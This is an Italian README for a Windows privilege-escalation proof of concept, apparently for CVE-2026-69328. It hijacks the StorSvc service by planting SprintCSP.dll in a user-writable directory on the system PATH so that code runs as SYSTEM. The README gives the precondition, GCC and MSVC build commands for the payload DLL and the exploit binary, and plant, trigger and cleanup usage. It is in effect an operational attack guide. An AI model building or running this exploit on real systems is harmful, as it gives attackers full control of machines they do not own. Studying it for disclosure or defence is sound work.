
Exploit di escalation dei privilegi su Windows che inserisce SprintCSP.dll in una directory HKLM PATH scrivibile dall'utente per dirottare StorSvc ed eseguire come SYSTEM.
StorSvc carica SprintCSP.dll per nome relativo come SYSTEM. Piazzalo in una directory HKLM PATH scrivibile dall'utente, ottieni SYSTEM.
Richiede una directory scrivibile dall'utente in HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\Path.
Nessuna su un'immagine pulita. Gli installer di tooling le aggiungono (%USERPROFILE%\.cargo\bin, .local\bin, Python Scripts). Se la macchina non ne ha nessuna, CVE-2026-69328.exe --setup ne crea una, il che richiede un prompt admin una tantum. L'exploit stesso non necessita mai di admin.
GCC:
gcc payload.c -shared -o SprintCSP.dll
gcc CVE-2026-69328.c -lrpcrt4 -ladvapi32 -lshell32 -o CVE-2026-69328.exe
MSVC:
cl /LD payload.c /Fe:SprintCSP.dll
cl CVE-2026-69328.c rpcrt4.lib advapi32.lib shell32.lib /Fe:CVE-2026-69328.exe
CVE-2026-69328.exe plant, trigger, read proof
CVE-2026-69328.exe --cleanup remove proof file + planted DLL
La prova arriva in C:\Windows\System32\CVE-2026-69328.txt.
StorSvc va in crash dopo il caricamento e SCM lo riavvia dopo ~120s.